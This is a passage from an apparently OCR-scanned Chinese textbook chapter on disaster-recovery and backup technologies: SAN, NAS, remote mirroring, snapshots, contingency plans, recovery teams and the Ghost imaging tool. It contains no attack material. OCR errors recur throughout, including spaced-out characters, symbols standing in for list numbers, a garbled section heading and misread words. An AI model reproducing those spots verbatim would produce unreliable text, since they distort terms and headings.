试 ,并 随时 调整 ,加 以 改进 ,完整 的 系统 恢复 方案 才能 得 以 建立 。 其 中 灾难 恢复 策略 在 整 
个 恢复 方案 中 占有 非常 重要 的 作用 。 

可 以 按照 以 下 几 个 步骤 来 制定 数据 恢复 策略 。 

中 评估 公司 对 数据 流 和 有 效 数据 的 需要 性 。 

© 每 次 数据 损坏 事故 造成 的 经 济 损失 有 多 大 。 

@ 在 多 长 时 间 范 围 内 必须 成 功 进行 数据 恢复 ,以 避免 其 影响 企业 收益 。 

@@ 评估 数据 损失 的 风险 ,确定 跨 部 门 的 数据 恢复 策略 优先 级 别 。 

C) 评估 数据 存储 设备 的 所 有 潜在 的 风险 。 

使 用 上 述评 估 结 果 制 定 质 优 价 廉 的 安全 机 制 ( 包 括 备 份 ) 。 

CD 数据 损失 的 间接 代价 是 什么 。 

@ 通过 对 所 有 的 数据 损坏 进行 预算 来 制定 预防 策略 和 最 终 的 数据 恢复 策略 。 


10.1.5. 容 灾 备份 技术 


建立 容 灾 备份 系统 时 会 涉及 多 种 技术 ,如 SAN 技术 .DAS 技术 、NAS 技术 、 远 程 镜 
像 技术 、 虚 拟 存储 、 基 于 IP 的 SAN 的 互 连 技术 、 快 照 技术 、 推 技术 、RAIT 或 并 行 流 技 
术 等 。 

1. SAN 技术 

SAN(Storage Area Network ,存储 局 域 网 ) 是 独立 于 服务 器 网 络 系统 之 外 几乎 拥有 
无 限 存储 的 高 速 存储 网 络 , 它 以 光纤 通道 作为 传输 媒体 ,以 光纤 通道 和 SCSI 的 应 用 协议 
作为 存储 访问 协议 ,将 存储 子 系统 网 络 化 。 光 纤 通 道 技术 具有 带宽 高 . 误 码 率 低 和 距离 长 
等 特点 ,特别 适合 于 海量 数据 传输 领域 ,所 以 被 应 用 于 主机 和 存储 器 间 的 连接 通道 和 组 网 
技术 中 。 基 于 SAN 的 备份 解决 方案 既 包括 集中 式 备份 解决 方案 的 所 有 管理 上 的 优点 ， 
又 涵盖 分 布 式 ( 直 连 式 ) 备 份 方案 所 独 具 的 高 速 数据 传输 率 的 特点 。 

2. DAS 技术 

DAS(Direct Attachment Storage. 直接 挂 接 存 储 ) 数 据 存 储 设备 直接 挂 接 在 各 种 服务 
器 或 客户 端 扩展 接口 下 ,服务 器 通过 I/O 通道 服务 来 直接 访问 DAS 中 的 数据 。DAS 本 
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身 是 硬件 的 堆 琶 ,不 带 有 任何 存储 操作 系统 ,而 应 用 服务 器 本 身 的 操作 系统 与 第 三 方 应 用 
软件 挂 接 , 使 得 DAS 设备 的 价格 相对 比较 便宜 。 

3. NAS 技术 

NAS(Network Attachment Storage, 网 络 挂 接 存储 ) 技 术 可 以 满足 无 专用 直接 连接 
存储 设备 的 主机 存储 需要 。 由 于 NAS 具有 协议 公开 .操作 简单 和 适应 范围 广 的 特点 , 特 
别 是 在 以 文件 处 理 为 基础 的 多 用 户 网 络 计算 环境 中 ,NAS 更 以 其 良好 的 扩展 能 力 成 为 重 
要 的 存储 手段 。 

4. 远程 镜像 技术 

这 种 技术 克服 了 传统 镜像 和 备份 技术 在 时 空 方面 的 局 限 性 ,能 够 保障 关键 业务 在 大 
规模 灾害 或 危机 发 生 时 仍然 能 够 持续 不 断 地 稳定 运行 。 远 程 数 据 镜 像 技术 实现 了 数据 在 
不 同 环境 间 的 实时 有 效 复制 ,无 论 这 些 环境 间 相 距 几 米 `. 几 公里 ,还 是 横 下 大 陆 。 

远程 镜像 技术 是 在 主 数据 中 心 和 备 援 中 心 之 间 的 数据 备份 时 用 到 。 镜 像 是 在 两 个 或 
多 个 磁盘 或 磁盘 子 系统 上 产生 同一 个 数据 的 镜像 视图 的 信息 存储 过 程 , 一 个 称 为 主 镜像 
系统 , 另 一 个 称 为 从 镜像 系统 。 按 主 \ 从 镜像 存储 系统 所 处 的 位 置 可 分 为 本 地 镜像 和 远程 
镜像 。 

远程 镜像 又 称 远程 复制 ,是 容 灾 备份 的 核心 技术 ,同时 也 是 保持 远程 数据 同步 和 实现 
灾难 恢复 的 基础 。 远 程 镜 像 按 请 求 镜像 的 主机 是 否 需要 远程 镜像 站 点 的 确认 信息 ,又 可 
分 为 同步 远程 镜像 和 异步 远程 镜像 。 

同步 远程 镜像 (同步 复制 技术 ) 是 指 通 过 远程 镜像 软件 ,将 本 地 数据 以 完全 同步 的 方 
式 复制 到 异地 ,每 一 本 地 的 L/O 事务 均 需 要 等 待 远程 复制 的 完成 确认 信息 , 方 予以 释放 。 
同步 镜像 使 远程 复制 总 能 与 本 地 机 要 求 复制 的 内 容 相 匹 配 。 当 主 站 点 出 现 故 障 时 ,用 户 
的 应 用 程序 切换 到 备份 的 替代 站 点 后 ,被 镜像 的 远程 副本 可 以 保证 业务 继续 执行 而 没有 
数据 的 丢失 。 但 它 存在 往返 传播 造成 延 时 较 长 的 缺点 ,只 限于 在 相对 较 近 的 距离 上 应 用 。 

异步 远程 镜像 (异步 复制 技术 ) 保 证 在 更 新 远程 存储 视图 前 完成 向 本 地 存储 系统 的 基 
本 1/0 操作 ,而 由 本 地 存储 系统 提供 给 请 求 镜像 主机 的 1/0 操作 完成 确认 信息 。 远 程 的 
数据 复制 是 以 后 台 同 步 的 方式 进行 的 ,这 使 本 地 系统 性 能 受到 的 影响 很 小 ,传输 距离 长 
(可 达 1000km 以 上 ), 对 网 络 带 宽 要 求 小 。 但 是 ,许多 远程 的 从 属 存 储 子 系统 的 写 操作 没 
有 得 到 确认 , 当 某 种 因素 造成 数据 传输 失败 ,可 能 出 现 数据 一 致 性 问题 。 为 解决 这 个 问 
题 ,目前 大 多 采用 延迟 复制 的 技术 , 即 在 确保 本 地 数据 完好 无 损 后 进行 远程 数据 更 新 。 

5. 虚拟 存储 

在 有 些 容 灾 方案 产品 中 ,还 采取 虚拟 存储 技术 ,如 西 瑞 异 地 容 灾 方 案 。 虚 拟 化 存储 技 
术 在 系统 弹性 和 可 扩展 性 上 开创 了 新 的 局 面 。 它 将 几 个 IDE 或 SCSI 驱动 器 等 不 同 的 存 
储 设备 串联 为 一 个 存储 池 。 存 储 集群 的 整个 存储 容量 可 以 分 为 多 个 逻辑 卷 ,并 作为 虚拟 
分 区 进行 管理 。 存 储 由 此 成 为 一 种 功能 而 非 物理 属性 ,而 这 正 是 基于 服务 器 的 存储 结构 
存在 的 主要 限制 。 

虚拟 存储 系统 还 提供 了 动态 改变 逻辑 卷 大 小 的 功能 。 事 实 上 ,存储 卷 的 容量 可 以 在 
线 随意 增加 或 减少 。 可 以 通过 在 系统 中 增加 或 减少 物理 磁盘 的 数量 来 改变 集群 中 逻辑 卷 
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的 大 小 。 这 一 功能 允许 卷 的 容量 随 用 户 的 即时 要 求 动 态 改变 。 另 外 ,存储 卷 能 够 很 容易 
地 改变 容量 ,实现 移动 和 替换 。 安 装 系统 时 ,只 需 为 每 个 逻辑 卷 分 配 最 小 的 容量 ,并 在 磁 
盘 上 留 出 剩余 的 空间 。 随 着 业务 的 发 展 , 可 以 用 剩余 空间 根据 需要 扩展 逻辑 卷 。 你 也 可 
以 将 数据 在 线 从 旧 驱 动 器 转移 到 新 的 驱动 器 上 ,而 不 中 断 服务 地 运行 。 

存储 虚拟 化 的 一 个 关键 优势 是 它 允 许 异 质 系 统 和 应 用 程序 共享 存储 设备 ,而 不 管 它 
们 位 于 何 处 。 公 司 将 不 再 需要 在 每 个 分 部 的 服务 器 上 都 连接 一 台 磁 带 设 备 。 

6. 基于 IP 的 SAN 的 互 连 技术 

早期 的 主 数据 中 心 和 备 援 数据 中 心 之 间 的 数据 备份 ,主要 是 基于 SAN 的 远程 复制 
(镜像 ), 即 通过 光纤 通道 FC, 把 两 个 SAN 连接 起 来 ,进行 远程 镜像 (复制 )。 当 灾难 发 生 
时 ,由 备 援 数据 中 心 蔡 代 主 数据 中 心 保证 系统 工作 的 连续 性 。 这 种 远程 容 灾 备 份 方式 存 
在 一 些 缺 陷 , 如 实现 成 本 高 .设备 的 互 操作 性 差 和 跨越 的 地 理 距离 短 (10km) 等 ,这 些 因 素 
阻碍 它 的 进一步 推广 和 应 用 。 

目前 ,出 现 了 多 种 基于 IP 的 SAN 的 远程 数据 容 灾 备份 技术 。 它 们 是 利用 基于 IP 的 
SAN 的 互 连 协议 ,将 主 数据 中 心 SAN 中 的 信息 通过 现 有 的 TCP/IP 网 络 ,远程 复制 到 备 
援 中 心 SAN 中 。 当 备 援 中 心 存储 的 数据 量 过 大 时 ,可 以 利用 快照 技术 将 其 备份 到 磁带 
库 或 光盘 库 中 。 这 种 基于 IP 的 SAN 的 远程 容 灾 备份 ,可 以 跨越 LAN MAN 和 WAN, 
成 本 低 、 可 扩展 性 好 ,具有 广阔 的 发 展 前 景 。 

7. 快照 技术 

远程 镜像 技术 往往 同 快照 技术 结合 起 来 实现 远程 备份 , 即 通过 镜像 把 数据 备份 到 远 
程 存储 系统 中 ,再 用 快照 技术 把 远程 存储 系统 中 的 信息 备份 到 远程 的 磁带 库 .光盘 库 中 。 

快照 是 通过 软件 对 要 备份 的 磁盘 子 系统 的 数据 快速 扫描 ,建立 一 个 要 备份 数据 的 快 
HEAR QC LUN 和 快照 cache, 在 快速 扫描 时 ,把 备份 过 程 中 即将 要 修改 的 数据 块 同 
时 快速 复制 到 快照 cache 中 。 快 照 LUN 是 一 组 指针 , 它 在 备份 过 程 中 指向 快照 cache 和 
磁盘 子 系统 中 不 变 的 数据 块 。 在 正常 业务 进行 的 同时 ,利用 快照 LUN 实现 对 原 数据 的 
一 个 完全 的 备份 。 它 可 使 用 户 在 正常 业务 不 受 影响 的 情况 下 ,实时 提取 当前 在 线 业 务 数 
据 。 其 “备份 窗口 ”接近 于 零 , 可 大 大 增加 系统 业务 的 连续 性 ,为 实现 系统 真正 的 7X24 运 
转 提 供 保 证 。 快 照 是 通过 内 存 作为 缓冲 区 (快照 cache) ,由 快照 软件 提供 系统 磁盘 存储 的 
即时 数据 映像 , 它 存 在 缓冲 区 调度 的 问题 。 

8. 推 技术 

推 技术 是 一 种 代理 程序 , 它 安装 在 需要 备份 的 客户 机 上 ,按照 备份 服务 器 的 要 求 , 代 
理 程 序 产生 需要 备份 文件 的 列表 .将 这 些 文件 进行 打包 压缩 , 送 到 备份 服务 器 上 。 它 代理 
一 部 分 备份 服务 器 的 工作 ,提高 网 络 备份 的 效率 。 

9. RAIT 

RAIT(Redundant Array of Inexpensive Tape) 将 多 个 相同 的 磁带 驱动 器 做 成 一 个 阵 
列 , 既 可 以 提高 备份 性 能 ,又 可 以 提高 磁带 的 容错 性 。 

10. 并 行 流 技术 


并 行 流 技术 指 在 同一 个 备份 服务 器 上 连接 了 多 个 备份 设备 ,同时 也 提交 多 个 备份 任 
务 ,它们 分 别针 对 不 同 的 磁带 设备 。 这 样 可 以 达到 并 行 操作 。 但 它 不 像 RAIT 技术 那样 
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具备 容错 的 功能 。 

下 面 是 对 个 人 用 户 提出 的 一 些 备份 建议 。 

(1) 操作 系统 与 应 用 软件 备份 。 在 安装 完 操 作 系统 与 应 用 软件 后 ,将 操作 系统 所 在 
的 分 区 映射 为 一 个 镜像 文件 (使 用 Ghost) ,保存 在 另 一 块 硬盘 或 男 一 个 逻辑 分 区 上 ,这 样 
在 数据 恢复 时 就 可 以 直接 由 镜像 文件 恢复 操作 系统 。 

如 果 应 用 软件 没有 安装 在 系统 盘 (C 盘 ) 的 Program Files 文件 夹 下 ,而 是 安装 在 了 其 
他 分 区 (D 盘 ) 上 ,那么 在 备份 C 盘 后 也 要 备份 D 盘 , 这 样 操作 系统 发 生 数据 故障 后 ,就 会 
很 快 恢复 系统 ,而 不 用 重新 安装 操作 系统 与 所 有 的 软件 。 

(2) 文档 备份 。 例 如 对 于 Office 文档 (包括 Word, PowerPoint, Excel 文档 等 ) 需 要 经 
常 整理 ,然后 定期 备份 。 

G) 邮件 与 地 址 筹备 份 。Outlook( 或 Foxmail) 里 的 邮件 与 地 址 簿 可 以 通过 其 “导出 ” 
工具 来 把 地 址 信息 导出 和 邮件 导出 ,将 导出 的 信息 复制 到 其 他 存储 介质 上 可 以 完成 备份 。 


10.1.6. 容 灾 备份 等 级 


设计 一 个 容 灾 备 份 系统 需要 考虑 多 个 因素 : 备份 /恢复 数据 量 大 小 、 应 用 数据 中 心 与 
备 援 数据 中 心 之 间 的 距离 和 数据 传输 方式 、 灾 难 发 生 时 所 要 求 的 恢复 速度 、 备 援 中心 的 管 
理 及 投入 资金 等 。 根 据 这 些 因素 和 不 同 的 应 用 场合 ,将 容 灾 备份 划分 为 四 个 等 级 。 

第 0 级 :没有 备 援 中 心 。 

第 1 级 :本 地 磁带 备份 ,异地 保存 。 

第 2 级 : 热 备 份 站 点 容 灾 备 份 方式 。 

第 3 级 :活动 备 援 中 心 。 

我 国 容 灾 备份 等 级 的 划分 类 似 于 国际 标准 SHARE 78.1992 年 美国 的 SHARE 用 户 
组 与 IBM 一 起 ,定义 了 SHARE 78 标准 ,该 标准 将 容 灾 系 统 分 为 7 层 , 分 别 适用 于 不 同 
的 规模 和 应 用 场合 。 有 兴趣 的 读者 可 以 在 网 上 查找 SHARE 78 标准 的 文档 。 


10.1.7 数据 容 灾 与 备份 的 联系 


备份 是 指 用 户 为 应 用 系统 产生 的 重要 数据 (或 者 原 有 的 重要 数据 信息 ) 制 作 一 份 或 者 
多 份 副本 ,以 增强 数据 的 安全 性 。 

备份 与 容 灾 关注 的 对 象 不 同 , 备 份 关注 数据 的 安全 , 容 灾 关注 业务 应 用 的 安全 。 

可 以 把 备份 称 做 是 “数据 保护 ”, 而 容 灾 称 做 “业务 应 用 保护 ”。 

备份 通过 备份 软件 使 用 磁带 机 或 者 磁带 库 ( 有 些 用 户 使 用 磁盘 、 光 盘 ) 作 为 存储 介质 
将 数据 进行 复制 , 容 灾 则 表现 为 通过 高 可 用 方案 将 两 个 站 点 或 者 系统 连接 起 来 。 

备份 与 容 灾 是 存储 领域 两 个 非常 重要 的 部 分 ,二 者 有 着 密切 的 联系 。 

首先 ,在 备份 与 容 灾 中 都 有 数据 保护 工作 ,备份 大 多 采用 磁带 方式 ,性 能 低 ,成 本 低 ; 
容 灾 采 用 磁盘 方式 进行 数据 保护 .数据 随时 在 线 , 性 能 高 成 本 高 。 

其 次 ,备份 是 存储 领域 的 一 个 基础 ,在 一 个 完整 的 容 灾 方 案 中 必然 包括 备份 的 部 分 ; 
同时 备份 还 是 容 灾 方 案 的 有 效 补 充 , 因 为 容 灾 方案 中 的 数据 始终 在 线 , 因 此 存储 有 完全 被 
破坏 的 可 能 ,而 备份 提供 额外 的 一 条 防线 ,即使 在 线 数据 丢失 也 可 以 从 备份 数据 中 恢复 。 

数据 容 灾 与 数据 备份 的 联系 主要 体现 在 以 下 几 个 方面 。 
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COD 数据 备份 是 数据 容 灾 的 基础 。 数 据 备份 是 数据 高 可 用 的 最 后 一 道 防线 ,其 目的 
是 为 了 系统 数据 崩溃 时 能 够 快速 地 恢复 数据 。 虽然 它 也 算 一 种 容 灾 方案 ,但 这 种 容 灾 能 
力 非常 有 限 ,因为 传统 的 备份 主要 是 采用 数据 内 置 或 外 置 的 磁带 机 进行 冷 备份 ,备份 磁带 
同时 也 在 机 房 中 统一 管理 ,一 旦 整个 机 房 出 现 灾难 ,如 火灾 、 盗 穿 和 地 震 等 灾难 时 ,这 些 备 
份 磁带 也 随 之 销毁 ,所 存储 的 磁带 备份 也 起 不 到 任何 容 灾 功 能 。 

(2) 容 灾 不 是 简单 备份 。 真 正 的 数据 容 灾 就 是 要 避免 传统 冷 备份 所 具有 的 先天 不 
足 , 它 能 在 灾难 发 生 时 ,全 面 、 及 时 地 恢复 整个 系统 。 不 过 数据 备份 还 是 最 基础 的 ,没有 备 
份 的 数据 ,任何 容 灾 方 案 都 没有 现实 意义 。 而 容 灾 对 于 IT 而 言 , 是 能 够 提供 一 个 防止 各 
种 灾难 的 计算 机 信息 系统 。 

(3) 容 灾 不 仅 是 技术 。 容 灾 是 一 个 系统 工程 ,不 仅 包括 各 种 容 灾 技术 ,还 应 有 一 整套 
容 灾 流程 .规范 及 其 具体 措施 。 


10.1.8. KIFE 


严格 地 说 , 容 灾 计 划 包 括 一 系列 应 急 计 划 ,如 业务 持续 计划 、 业 务 恢 复 计 划 ,操作 连续 
性 计划 、 事 件 响应 计划 、 场 所 紧急 计划 、 危 机 通信 计划 和 灾难 恢复 计划 等 。 

CD 业务 持续 计划 (Business Continuity Plan,BCP)。 业 务 持续 计划 是 一 套用 来 降低 
组 织 的 重要 营运 功能 遭受 未 料 的 中 断 风 险 的 作业 程序 , 它 可 能 是 人 工 或 系统 自动 的 。 业 
务 持续 计划 的 目的 是 使 一 个 组 织 及 其 信息 系统 在 灾难 事件 发 生 时 仍 可 以 继续 运作 。 

(2) 业务 恢复 计划 (Business Recovery Plan. BRP)。 业 务 恢复 计划 也 称 业 务 继续 计 
划 , 涉 及 紧急 事件 后 对 业务 处 理 的 恢复 ,但 与 BCP 不 同 , 它 在 整个 紧急 事件 或 中 断 过 程 中 
缺乏 确保 关键 处 理 的 连续 性 的 规程 。BRP 的 制定 应 该 与 灾难 恢复 计划 及 BCP 进行 协 
调 。BRP 应 该 附加 在 BCP 之 后 。 

(3) 操作 连续 性 计划 (Continuity of Operations Plan,COOP) 。 操 作 连 续 性 计划 关注 
的 是 位 于 机 构 ( 通 常 是 总 部 单位 ) 备 用 站 点 的 关键 功能 以 及 这 些 功 能 在 恢复 到 正常 操作 状 
态 之 前 最 多 30 天 的 和 运行。 由 于 COOP 涉及 总 部 级 的 问题 , 它 和 BCP 是 互相 独立 制定 和 
执行 的 。COOP 的 标准 要 素 包 括 职权 条 款 、 连 续 性 的 顺序 和 关键 记录 和 数据 库 。 由 于 
COOP 强调 机 构 在 备用 站 点 恢复 运行 中 的 能 力 ,所 以 该 计划 通常 不 包括 IT 运行 方面 的 
内 容 。 另 外 , 它 不 涉及 无 须 重 新 配置 到 备用 站 点 的 小 型 危害 。 但 是 COOP 可 以 将 BCP、 
BRP 和 灾难 恢复 计划 作为 附录 。 

(4) 事件 响应 计划 (Incident Response Plan,IRP)。 事 件 响应 计划 建立 处 理 针 对 机 构 的 
IT 系统 攻击 的 规程 。 这 些 规程 用 来 协助 安全 人 员 对 有 害 的 计算 机 事件 进行 识别 .削减 并 进 
行 恢 复 , 这 些 事 件 的 例子 包括 : 对 系统 或 数据 的 非法 访问 ,拒绝 服务 攻击 或 对 硬件 软件、 数 
据 的 非法 更 改 (如 有 害 逻 辑 病毒 .蠕虫 或 木马 等 )。 本 计划 可 以 包含 在 BCP 的 附录 中 。 

(5) 场所 紧急 计划 (Occupant Emergency Plan,OEP) 。 场 所 紧急 计划 在 可 能 对 人 员 
的 安全 健康 、 环 境 或 财产 构成 威胁 的 事件 发 生 时 ,为 设施 中 的 人 员 提 供 反应 规程 。OEP 
在 设施 级 别 进 行 制定 ,与 特定 的 地 理 位 置 和 建筑 结构 有 关 。 设 施 OEP 可 以 附加 在 BCP 
之 后 ,但 是 独立 执行 。 

(6) 危机 通信 计划 (Crisis Communication Plan,CCP) 。 机 构 应 该 在 灾难 之 前 做 好 其 
内 部 和 外 部 通信 规程 的 准备 工作 。CCP 通常 由 负责 公共 联络 的 机 构 制 定 。 危 机 通信 计 
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划 规 程 应 该 和 所 有 其 他 计划 协调 ,以 确保 只 有 受到 批准 的 内 容 公 之 于 众 , 它 应 该 作为 附录 
包含 在 BCP 中 。 通 信 计 划 通 常 指定 特定 的 人 员 作 为 在 灾难 反应 中 回答 公众 问题 的 唯一 
发 言 人 。 它 还 可 以 包括 向 个 人 和 公众 散发 状态 报告 的 规程 ,如 记者 招待 会 的 模板 。 

(7) 灾难 恢复 计划 (Disaster Recovery Plan,DRP)。 正 如 其 名 字 所 表示 的 ,灾难 恢复 
计划 应 用 于 重大 ,通常 是 灾难 性 ,长 时 间 无 法 对 正常 设施 进行 访问 的 事件 。 通 常 ,DRP 指 
用 于 紧急 事件 后 在 备用 站 点 恢复 目标 系统 、 应 用 或 计算 机 设施 运行 的 IT 计划 。DRP 的 
范围 可 能 与 IT 应 急 计划 重 又 ,但 是 DRP 的 范围 比较 狭窄 , 它 不 涉及 无 须 重 新 配置 的 小 型 
危害 。 根据 机 构 的 需要 ,可 能 会 有 多 个 DRP 附加 在 BCP 之 后 。 灾 难 恢复 计划 的 目的 是 
将 灾难 造成 的 影响 减少 到 最 小 程度 ,并 采取 必要 的 步骤 来 保证 资源 .员工 和 业务 流程 能 够 
继续 运行 。 灾 难 恢 复 计 划 和 业务 连续 性 计划 不 同 , 业 务 连 续 性 计划 用 来 为 长 时 间 的 停工 
和 灾难 提供 处 理 方 法 和 步 又。 而 灾难 恢复 计划 的 目标 是 在 灾难 发 生 后 马上 处 理 灾难 及 其 
后 果 。 灾 难 恢复 计划 在 所 有 事情 都 还 处 于 紧急 状态 的 时 候 就 开始 执行 ,而 业务 连续 性 计 
划 考 虑 问题 的 方面 更 加 长 远 。 


10.1.9 组 织 与 职责 分 配 


在 确定 了 灾难 恢复 计划 后 ,必须 组 建 合适 的 团队 来 实施 恢复 策略 ,并 确定 与 各 个 团队 
相关 的 关键 决策 者 、 信 息 部 门 和 终端 用 户 的 相关 职责 。 这 些 团队 负责 对 事件 进行 响应 ,对 
功能 进行 恢复 和 使 系统 回 到 正常 运行 状态 。 这 些 团队 的 数量 和 种 类 根据 组 织 规模 和 需要 
来 组 织 ,可 能 包括 以 下 小 组 。 

CD 事件 响应 小 组 。 一 旦 发 生 威胁 到 信息 资产 和 业务 流程 的 安全 事件 ,就 必须 及 时 
上 报到 事件 响应 小 组 ,事件 响应 小 组 根据 对 事件 的 初步 分 析 , 确 定 事件 的 性 质 ,通知 有 关 
团队 采取 下 一 步行 动 。 

(2) 应 急行 动 小 组 。 针 对 灾难 事件 的 第 一 时 间 响 应 小 组 。 由 处 理 火灾 的 救火 员 或 其 
他 突 发 事件 人 员 组 成 。 他 们 的 首要 职责 是 有 序 地 牙 散 危险 环境 下 的 员工 ,包括 员工 生命 
安全 。 

(3) 损失 评估 小 组 。 评 估 灾 难 的 范围 。 通 常 由 能 评估 灾难 程度 和 恢复 时 间 的 专业 人 
士 组 成 。 损 失 评 估 小 组 有 责任 指出 灾难 发 生 的 原因 ,以 及 业务 中 断 造 成 的 影响 大 小 。 

(4) 应 急 管 理 小 组 。 负 责 启动 灾难 恢复 计划 并 监督 恢复 操作 的 运行 ,并 对 灾难 恢复 
过 程 中 的 重大 问题 做 出 决策 。 

(5) 异地 存储 小 组 。 获 取 、 包 装 、 运 送 备 份 介质 和 相关 记录 文件 到 灾难 恢复 地 点 , 同 
时 在 恢复 站 点 运行 期 间 , 建 立 和 检查 新 产生 数据 的 异地 备份 工作 。 

此 外 ,还 可 以 包括 应 急 作 业 小 组 ,应 用 软件 小 组 、 系 统 软 件 小 组 、 安 全 小 组 、 网 络 恢复 
小 组 .通信 人 小组、 运输 小 组 、 硬 件 小 组 、 供 应 小 组 ,协调 小 组 .异地 安置 小 组 法律 事务 小 组 、 
恢复 测试 小 组 和 培训 小 组 等 。 


10.2 数据 备份 技术 


2001 年 9 月 11 日 ,世贸 双子 楼 倒塌 ,但 位 于 世贸 中 心 内 的 著名 财经 咨询 公司 摩根 。 
斯 坦 利 公 司 在 灾后 第 二 天 就 进入 正常 的 工作 状态 ,在 危机 时 刻 公司 的 远程 数据 防 灾 系统 
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忠实 地 工作 到 大 楼 倒塌 前 的 最 后 一 秒 钟 ,此 前 的 所 有 商务 资料 已 安全 地 备份 到 了 离世 贸 中 
心 数 千 米 之 遥 的 第 二 个 办 事 处 。 摩 根 * 斯 坦 利 公司 的 数据 安全 战略 将 突 发 危机 的 不 利 影响 
降 到 最 低 程度 。 据 美国 的 一 项 研究 报告 显示 ,在 灾害 之 后 ,如 果 无 法 在 14 天 内 恢复 业务 数 
据 ,75% 的 公司 业务 会 完全 停顿 ,43% 的 公司 再 也 无 法 重新 开业 ,20% 的 企业 将 在 两 年 之 内 
宣告 破产 。 美 国 Minnesota 大 学 的 研究 表明 ,遭遇 灾难 而 又 没有 恢复 计划 的 企业 ,60%% 以 上 
将 在 2 一 3 年 后 退出 市 场 。 在 所 有 数据 安全 战略 中 ,数据 备份 是 最 基础 的 工作 。 

数据 备份 就 是 将 数据 以 某 种 方式 加 以 保留 ,以 便 在 系统 遭受 破坏 或 其 他 特定 情况 下 ， 
重新 加 以 利用 的 一 个 过 程 。 数 据 备份 的 根本 目的 是 重新 利用 , 即 备份 工作 的 核心 是 恢复 ， 
一 个 无 法 恢复 的 备份 ,对 任何 系统 来 说 都 是 毫 无 意义 的 。 一 个 成 熟 的 备份 系统 能 够 安全 、 
方便 而 又 高 效 地 恢复 数据 。 

数据 备份 作为 存储 领域 的 一 个 重要 组 成 部 分 ,其 在 存储 系统 中 的 地 位 和 作用 都 是 不 
容 忽视 的 。 对 一 个 完整 的 IT 系统 而 言 ,备份 工作 是 其 中 必 不 可 少 的 组 成 部 分 。 其 意义 
不 仅 在 于 防范 意外 事件 的 破坏 ,而 且 还 是 历史 数据 保存 归档 的 最 佳 方式 。 换 言 之 ,即便 系 
统 正常 工作 ,没有 任何 数据 丢失 或 破坏 发 生 , 备 份 工 作 仍然 具有 非常 大 的 意义 (为 我 们 进 
行 历史 数据 查询 ,统计 和 分 析 , 以 及 重要 信息 归档 保存 提供 了 可 能 )。 


10.2.1 实践 案例 10-1: 操作 系统 备份 


1. Ghost 简介 

Ghost(General Hardware Oriented Software Transfer, 面 向 通用 型 硬件 的 软件 传送 
器 ) 软 件 是 美国 赛 门 铁 克 公司 推出 的 一 款 出 色 的 用 于 系统 数据 备份 与 恢复 的 工具 ,支持 
的 磁盘 分 区 文件 系统 格式 包括 FAT、FAT32、NTFS、ext2 和 ext3 等 。 在 这 些 用 处 当中 ， 
数据 备份 的 功能 得 到 极 高 频率 的 使 用 ,以 至 于 人 们 一 提起 Ghost 就 把 它 和 克隆 挂钩 , 往 
往 忽 略 它 其 他 的 一 些 功 能 。 在 微软 的 视窗 操作 系统 广 为 流 传 的 基础 上 ,为 避 开 视窗 操作 
系统 安装 的 费时 和 困难 ,有 人 把 Ghost 的 备份 还 原 操作 流程 简化 成 批 处 理 菜单 式 软件 打 
包 , 例 如 一 键 Ghost 一 键 还 原 精灵 等 ,使 得 它 的 操作 更 加 容易 ,进而 得 到 众多 的 菜鸟 级 人 
员 的 喜爱 。 由 于 它 和 它 制 作 的 . gho 文件 连 为 一 体 的 视窗 操作 系统 Windows XP/Vista/ 
Windows 7 等 作品 被 爱好 者 研习 实验 ,Ghost 在 狭义 上 又 被 人 特 指 为 能 快速 安装 的 视窗 
操作 系统 。 

Ghost 不 同 于 其 他 的 备份 软件 , 它 是 将 整个 硬盘 或 硬盘 的 一 个 分 区 作为 一 个 对 象 来 
操作 ,可 以 将 对 象 打包 压缩 成 为 一 个 映像 文件 (Image) ,在 需要 的 时 候 ,又 可 以 把 该 映像 
文件 恢复 到 对 应 的 分 区 或 对 应 的 硬盘 中 。 

Ghost 的 功能 包括 两 个 硬盘 之 间 的 对 拷 、 两 个 硬盘 的 分 区 之 间 的 对 拷 、 两 台电 脑 硬 盘 
之 间 的 对 拷 、 制 作 硬盘 的 映像 文件 等 ,用 得 比较 多 的 是 分 区 备份 功能 ,能 将 硬盘 的 一 个 分 
区 压缩 备份 成 映像 文件 ,然后 存储 在 另 一 个 分 区 中 ,如 果 原 来 的 分 区 发 生 问题 ,可 以 用 备 
件 的 映像 文件 进行 恢复 。 基 于 此 ,可 以 利用 Ghost 来 备份 或 恢复 系统 。 对 于 学 校 和 网 
吧 ,使 用 Ghost 软件 进行 硬盘 对 拷 可 迅速 方便 地 实现 系统 的 快速 安装 和 恢复 ,而 且 维护 
起 来 也 比较 容易 。 

Ghost 的 备份 还 原 是 以 硬盘 的 扇 区 为 单位 进行 的 ,也 就 是 说 ,可 以 将 一 个 硬盘 上 的 物 
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理 信息 完整 复制 ,而 不 仅仅 是 数据 的 简单 复制 ;Ghost 支持 将 分 区 或 硬盘 直接 备份 到 一 个 
扩展 名 为 . gho 的 文件 里 (. gho 的 文件 称 为 镜像 文件 ) ,也 支持 直接 备份 到 另 一 个 分 区 或 
硬盘 里 。 

新 版 本 的 Ghost 包括 DOS 版 和 Windows 版 ,DOS 版 只 能 在 DOS 环境 中 运行 。 
Windows 版 只 能 在 Windows 环境 中 运行 。 不 管 是 在 DOS 下 运行 Ghost(ghost. exe) 还 
是 在 Windows 下 运行 Ghost, 两 者 的 操作 界面 都 是 一 致 的 ,实现 相同 的 功能 ,但 是 在 
Windows 下 运行 Ghost(Windows 版 Ghost) 时 是 不 能 恢复 Windows 操作 系统 所 在 的 分 
区 ,因此 在 这 种 情况 下 需要 在 DOS 下 运行 Ghost(DOS 版 Ghost), M F DOS 的 高 稳定 
性 ,并 且 在 纯 DOS 环境 中 已 经 脱离 了 Windows 环境 ,所 以 建议 备份 Windows 操作 系统 
时 使 用 DOS 版 的 Ghost 软件 。 

由 于 Ghost 在 备份 还 原 是 按 扇 区 来 进行 复制 ,所 以 在 操作 时 一 定 要 小 心 , 不 要 把 目 
标 盘 ( 分 区 ) 弄 错 了 ,不 然 会 将 目标 盘 ( 分 区 ) 的 数据 全 部 抹 掉 ,所 以 一 定 要 细心 。 

2. Ghost 使 用 方案 

1) 备份 系统 

完成 操作 系统 及 各 种 驱动 的 安装 后 ,将 常用 的 软件 (如 杀毒 .媒体 播放 软件 Office 办 
公 软 件 等 ) 安 装 到 系统 所 在 盘 ,接着 安装 操作 系统 和 常用 软件 的 各 种 升级 补丁 ,然后 优化 
系统 ,最 后 你 就 可 以 在 DOS 下 做 系统 盘 的 备份 了 。 

2) 恢复 系统 

